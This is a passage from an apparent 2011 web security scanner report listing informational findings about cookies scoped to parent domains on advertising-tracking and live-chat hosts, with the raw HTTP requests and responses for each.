The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x113?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=17&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=L4-e5U0-I3U0; ra1_sid=3

Response

HTTP/1.1 200 OK
Content-Length: 295
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Fri, 15-Jun-2012 13:08:50 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=O4-e5X0-I3X0; Expires=Fri, 15-Jun-2012 13:08:50 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Fri, 15-Jun-2012 13:08:50 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://pb.tynt.com/mapping_pixel?from=radium&r1s=Bs25AtAC-6B1rEV5402loG5MaTQfJQkMnBcmQ6G5Fk8" width="1" height="1" border="0"/><img src="http://tag.admeld.com/pixel?admeld_datapr
...[SNIP]...

10.266. http://rs.gwallet.com/r1/pixel/x9r8101111 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x9r8101111

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ra1_uid=4626038992661376064; Expires=Sat, 16-Jun-2012 10:26:34 GMT; Path=/; Domain=gwallet.com; Version=1
ra1_sgm=P4-710-e5Y0-I3Y0; Expires=Sat, 16-Jun-2012 10:26:34 GMT; Path=/; Domain=gwallet.com; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x9r8101111 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://radiumone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=P4-710-e5Y0-I3Y0; ra1_sid=3

Response

HTTP/1.1 200 OK
Content-Length: 748
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Sat, 16-Jun-2012 10:26:34 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=P4-710-e5Y0-I3Y0; Expires=Sat, 16-Jun-2012 10:26:34 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Sat, 16-Jun-2012 10:26:34 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body>
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1009481472;
var google_conversion_language = "en";
var
...[SNIP]...

10.267. http://rs.gwallet.com/r1/pixel/x9r8962146 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x9r8962146

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ra1_uid=4626038992661376064; Expires=Sat, 16-Jun-2012 10:26:32 GMT; Path=/; Domain=gwallet.com; Version=1
ra1_sgm=P4-710-e5Y0-I3Y0; Expires=Sat, 16-Jun-2012 10:26:32 GMT; Path=/; Domain=gwallet.com; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x9r8962146 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://radiumone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_sgm=O4-e5X0-I3X0; ra1_uid=4626038992661376064; ra1_sid=21

Response

HTTP/1.1 200 OK
Content-Length: 748
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Sat, 16-Jun-2012 10:26:32 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=P4-710-e5Y0-I3Y0; Expires=Sat, 16-Jun-2012 10:26:32 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Sat, 16-Jun-2012 10:26:32 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body>
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1009481472;
var google_conversion_language = "en";
var
...[SNIP]...

10.268. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lgtix=NQACAM8ANgABAMUABgABAMUARAQBANYASQABAMUASgABAMUADAABAMUAHAAEAOMA/QABAMUAXgACANkAXwABAMUA; path=/; expires=Sat, 01-Jan-2050 23:59:59 GMT; domain=.legolas-media.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=8f8ac3d5-2ce2-4258-bdfe-d1053ae341c4; lgpr=//8=; lgtix=NQACAM8ANgABAMUABgABAMUARAQBANYASQABAMUASgABAMUADAABAMUAHAACAOMA/QABAMUAXgACANkAXwABAMUA

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:28:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=NQACAM8ANgABAMUABgABAMUARAQBANYASQABAMUASgABAMUADAABAMUAHAAEAOMA/QABAMUAXgACANkAXwABAMUA; path=/; expires=Sat, 01-Jan-2050 23:59:59 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 5
Connection: close

true;

10.269. http://sales.liveperson.net/hc/55601019/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/55601019/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-16101514677756-1308307280:0; expires=Sat, 16-Jun-2012 10:41:20 GMT; path=/hc/55601019; domain=.liveperson.net
LivePersonID=-16101514677756-1308307280:-1:-1:-1:-1; expires=Sat, 16-Jun-2012 10:41:20 GMT; path=/hc/55601019; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/55601019/?&site=55601019&cmd=mTagStartPage&lpCallId=100135419750-854863345855&protV=20&lpjson=1&page=http%3A//www.capitalone.com/creditcards/platinum-prestige-credit-card/11858/8/%3Flinkid%3DWWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85808EW&id=5882508600&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-uscard-sales-english&activePlugin=none&cobrowse=true&PV%21unit=uscard-sales&PV%21PageName=US%20Card%20Product%20Detail&PV%21Section=US%20Card%20Product%20Detail&PV%21visitorActive=1&SV%21language=english&SV%21LPgroup=test&SV%21sol=11858&SV%21tc=8&SV%21uscard-salesPageName=US%20Card%20Product%20Detail&SV%21Odyssey%20Test%20Group=TG&VV%21VisitorID=FB8DCF93533EFDA4&title=Capital%A0One%20Platinum%20Prestige&referrer=http%3A//www.creditcards.com/oc/%3Fpid%3D22105064%26pg%3D1477%26pgpos%3D2&cobrowse=true&cookie=LP_GROUP%3Dtest%3B%20BIGipServerpl_capitalone.com_80%3D812197130.29215.0000%3B%20v1st%3DFB8DCF93533EFDA4%3B%20itc%3DCAPITALONE11NZZZintmktgD4%3B%20caponecc%3Dxp1%253D_%253Achannel%253DAFF%252A20080402%253Atestgroup%253Dtg01%252A20110609%3B%20caponesn%3Dd526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA%3B%20external_id%3DGAN_ZZ10106002_USCGAN_j30423433k112308_631523960%3B%20smartTracking%3Dreferrer%253A%253A%253Dwww.creditcards.com HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/creditcards/platinum-prestige-credit-card/11858/8/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85808EW
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3522719960534431997; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1308307277856

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:41:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101514677756-1308307280:0; expires=Sat, 16-Jun-2012 10:41:20 GMT; path=/hc/55601019; domain=.liveperson.net
Set-Cookie: HumanClickKEY=3522719960534431997; path=/hc/55601019
Set-Cookie: HumanClickSiteContainerID_55601019=STANDALONE; path=/hc/55601019
Set-Cookie: LivePersonID=-16101514677756-1308307280:-1:-1:-1:-1; expires=Sat, 16-Jun-2012 10:41:20 GMT; path=/hc/55601019; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 17 Jun 2011 10:41:20 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"100135419750-854863345855","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

10.270. http://sales.liveperson.net/hc/57386690/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/57386690/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-16101514677756-1308223637:-1:-1:-1:-1; expires=Fri, 15-Jun-2012 11:29:14 GMT; path=/hc/57386690; domain=.liveperson.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/57386690/?&site=57386690&cmd=mTagKnockPage&lpCallId=420026561012-749661227920&protV=20&lpjson=1&id=4843849160&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556456&langId=-1&catalogId=10053&selectedCatgry=SEARCH%20ALL&navFlow=3&searchRedirect=lawn%20mower&Nu=P_PARENT_ID&locStoreNum=4501
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDAQDCBQQS=BBDCNFECICEINMCNLKOLMPBG

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:29:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1308223754992; expires=Fri, 17-Jun-2011 11:29:14 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 16 Jun 2011 11:29:14 GMT
Set-Cookie: HumanClickSiteContainerID_57386690=STANDALONE; path=/hc/57386690
Set-Cookie: LivePersonID=-16101514677756-1308223637:-1:-1:-1:-1; expires=Fri, 15-Jun-2012 11:29:14 GMT; path=/hc/57386690; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1480

lpConnLib.Process({"ResultSet": {"lpCallId":"420026561012-749661227920","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.271. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

segments_p1="eJwdkEFLAlEUhZmZt3jM6v2w9vUX+hkSFom20E1JEWZuoqTRIQzJlThJRG6iTBKC0TAaaGgxwkzaPWdzOJz55tx7n6t03HVcpR+Xtug0s0Tnb/Cft8ijEL48gz6QCZiUAtt19GpTrE/8LIMOWHAcQVt3SE6YN3IoGyTw3yl0LKSjh1okAH3xBOI+RG1uy3V133NMs1ZNlMTVCpAhJ/dS+J0V1F8j6TThPybwzy34oyVqPA2QyBdnFtuYud6Q9klemfcsH6O9yOt89nox/KIHnbVtIW+ubHNY2SXZIFPuQn+5zXiEtUc87JoPUZrzrfi19gKNTrFN3Yi9ZMEiRVDYFtsv4P9zxsmfJfP2Qsu8dg5+FN4XF0z3gdQz+x8/EXqu";Version=1;Path=/;Domain=invitemedia.com;Expires=Fri, 15-Jun-2012 12:52:40 GMT;Max-Age=31536000

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=38582&partnerID=169&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh44.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=f034cbc4-3674-4d22-be3a-aac76e8e10cb; uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; dp_rec="{\"1\": 1305981628+ \"3\": 1305981281+ \"2\": 1307963584+ \"4\": 1305981633}"; segments_p1="eJwdkL1qAlEUhNmf4nKrfbD0+go+hlgEJaYwlZIQ/GskSFa3MEisxFVCiE2IGhCEVVGyoKRYYTeaM9MMH7Ozc8652lbHvqVt9X4yRZeJIbpZgLcv8MMAXFpD35jx6RR9U1vqnBL0GK8l0BEL7kNo5xXOA/1mFmWjCPwTQ+eStNREifhItz6QGAeozaa1VkPXctrVSmSLXblDZMLJgxicO0O9C5xeG7z6Bn92wOUTalyFICN7zrzpYublCsiLPHa5R/BuAF13uS79Uh/6y6nzKdab8oBnHlzc8E34tfoFDR8xte4IPrFgF8MoZASHBfzfoB39GXLfdWA4s97twcY7YtNlHpF6Yv4D111xlA=="; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0Mjk0XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuHoXcAmwCjRcvbpexYFRo0pL4G0AaMFmM8lwvF6Ikj24MPrQFkGDQYDBgsGoOjk96xA0QsNm1FE34LVnkUT/b0QpHYumujdlyxA0RkfGlBEd85nFciS+PQeWVSUY+YPFoFWZolFp1GFd31lEZjIKHFu+f93yMKzgGZcY5S48vLfO2Sjz75gFWCW2Pf0Horox1dgx+26gCI6ayNI9Nb3gwhRACr9U2M="; io_freq_p1="eJzjEuZYliDAKNFy9ul7FgNGCzDNJcyxJF6ASeLgw+vvWRQYNBgMGCwYgIKPY4AqLzRsRhG8EAoUnIsm+DQAKDjjQwOSoAjHtlCBA0wSn96jiv4IFGhlllh0GlX0VqDAREaJc8v/v0M2dnOMALPEvqf3UASPglw1d9cFFMHucKDgre8HEYIA9TM+0g=="; partnerUID="eyIxNSI6IFsiMDA0MDAzMDAxNDAwMDAwNDQ5ODcyIiwgdHJ1ZV0sICI4NCI6IFsiRno2K0VTL2M5OU82ejVPQiIsIHRydWVdLCAiMTEzIjogWyJGUVdXQzJWSzJEV0YiLCB0cnVlXX0="

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 12:52:40 GMT
Set-Cookie: segments_p1="eJwdkEFLAlEUhZmZt3jM6v2w9vUX+hkSFom20E1JEWZuoqTRIQzJlThJRG6iTBKC0TAaaGgxwkzaPWdzOJz55tx7n6t03HVcpR+Xtug0s0Tnb/Cft8ijEL48gz6QCZiUAtt19GpTrE/8LIMOWHAcQVt3SE6YN3IoGyTw3yl0LKSjh1okAH3xBOI+RG1uy3V133NMs1ZNlMTVCpAhJ/dS+J0V1F8j6TThPybwzy34oyVqPA2QyBdnFtuYud6Q9klemfcsH6O9yOt89nox/KIHnbVtIW+ubHNY2SXZIFPuQn+5zXiEtUc87JoPUZrzrfi19gKNTrFN3Yi9ZMEiRVDYFtsv4P9zxsmfJfP2Qsu8dg5+FN4XF0z3gdQz+x8/EXqu";Version=1;Path=/;Domain=invitemedia.com;Expires=Fri, 15-Jun-2012 12:52:40 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1080839&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

10.272. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segs.btrll.com
Path:	/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BR_MBBV=Ak3UHRx%2BKy%2FsAb%2Fk4Ck; expires=Thu, 14-Jun-2012 11:26:56 GMT; path=/; domain=.btrll.com
DRN1=AGPX0VGWhBwAY9juTn4YeQBj2HROVkeDAGPYxU5-GHkAY9i_Tn4YeQBj3E5Rrwz4AGPYOk5wj4A; expires=Sat, 15-Jun-2013 11:26:56 GMT; path=/; domain=.btrll.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221 HTTP/1.1
Host: segs.btrll.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak3UHRx%2BKy%2FsAb%2Fk4Ck; DRN1=AGPX0VGWhBwAY9juTn4YeQBj2HROVkeDAGPYxU5-GHkAY9i_Tn4YeQBj3E5Rrwz4AGPYOk5v370

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 11:26:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak3UHRx%2BKy%2FsAb%2Fk4Ck; expires=Thu, 14-Jun-2012 11:26:56 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: DRN1=AGPX0VGWhBwAY9juTn4YeQBj2HROVkeDAGPYxU5-GHkAY9i_Tn4YeQBj3E5Rrwz4AGPYOk5wj4A; expires=Sat, 15-Jun-2013 11:26:56 GMT; path=/; domain=.btrll.com
Location: http://cache.btrll.com/default/Pix-1x1.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

10.273. http://services.krxd.net/geoip previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://services.krxd.net
Path:	/geoip

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ServedBy=logger014; path=/; domain=.krxd.net; expires=Wed, 14-Dec-2011 00:46:29 GMT
AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C5D64AB646BFEB78D85C2CE1B11A4408BBF84184FD95AB42FCDD37D4A5888A04E880077C4A63DD8E25321BB4EF5F9550AD0FDC6E3F9FDDF363AFDD86EB238E86A;PATH=/;DOMAIN=.krxd.net;EXPIRES=Wed, 14-Dec-2011 00:46:29 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /geoip?root_name=KRUX.ST.geo HTTP/1.1
Host: services.krxd.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.253.191.52.1305981477680138; ServedBy=logger016; AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C19ECD62FC500669949F2DABE51E11FC0254B5838D848975E9A1B28EBCD9F7A8E3A2424CB818FF241A96D7C3DF757CA158975E1DD9DA600B0D90415D97CBCB0B5
If-None-Match: "833b91a59b2962c75db21f499c2e9829d1408b57"

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=28800
Content-Type: text/javascript
Date: Thu, 16 Jun 2011 11:26:29 GMT
Etag: "833b91a59b2962c75db21f499c2e9829d1408b57"
Server: Krux Cache
Set-Cookie: ServedBy=logger014; path=/; domain=.krxd.net; expires=Wed, 14-Dec-2011 00:46:29 GMT
Set-Cookie: AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C5D64AB646BFEB78D85C2CE1B11A4408BBF84184FD95AB42FCDD37D4A5888A04E880077C4A63DD8E25321BB4EF5F9550AD0FDC6E3F9FDDF363AFDD86EB238E86A;PATH=/;DOMAIN=.krxd.net;EXPIRES=Wed, 14-Dec-2011 00:46:29 GMT
Via: 1.1 logger014.krxd.net
X-Age: 1
X-Cache: HIT
X-Cache-Hits: 1
X-GeoIP: 173.193.214.243
X-Request-Backend: geoip
X-Request-Time: D=253 t=1308223589584142
X-Served-By: logger014.krxd.net
X-Served-By: logger014.krxd.net
Content-Length: 75
Connection: keep-alive

KRUX.ST.geo={"country": "US", "region": "TX", "city": "Dallas", "dma": 623}

10.274. http://services.krxd.net/pixel.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://services.krxd.net
Path:	/pixel.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ServedBy=logger014; path=/; domain=.krxd.net; expires=Wed, 14-Dec-2011 00:47:11 GMT
AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C5D64AB646BFEB78D85C2CE1B11A4408BBF84184FD95AB42FCDD37D4A5888A04E880077C4A63DD8E25321BB4EF5F9550AD0FDC6E3F9FDDF363AFDD86EB238E86A;PATH=/;DOMAIN=.krxd.net;EXPIRES=Wed, 14-Dec-2011 00:47:11 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel.gif?_kcp_d=cnbc.com&_kpref_=http%3A%2F%2Fwww.cnbc.com%2F&_knifr=7&_kpid=d719e39d-e4be-4896-8d71-71012d0c51a0&_kcp_s=cnbc.com&_knpix=4&_kpix_0=http%3A%2F%2Fs0.2mdn.net%2F697683%2Fcnbc_pixel.gif&_kpix_1=http%3A%2F%2Foimg.nbcuni.com%2Fb%2Fss%2Fnbcuglobal%2C%2520nbcucnbcd%2C%2520nbcucnbcbu%2F1%2FH.2-pdv-2%2Fs18412435774225&_kpix_2=http%3A%2F%2Fa820.g.akamai.net%2Ff%2F820%2F822%2F1d%2Fi.ivillage.com%2Ftest%2Fadvertising_ops%2Fimages%2Fhousepix.gif&_kpix_3=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F3834 HTTP/1.1
Host: services.krxd.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.253.191.52.1305981477680138; ServedBy=logger016; AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23CDE8506D37590C50E65C0C58E501C7B3B7FE488564ACED0CE967CF643E9E1D62F505CBCBC3D02F16952DBBA934887EA49EE461F040D160A7B375DE59446425416

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
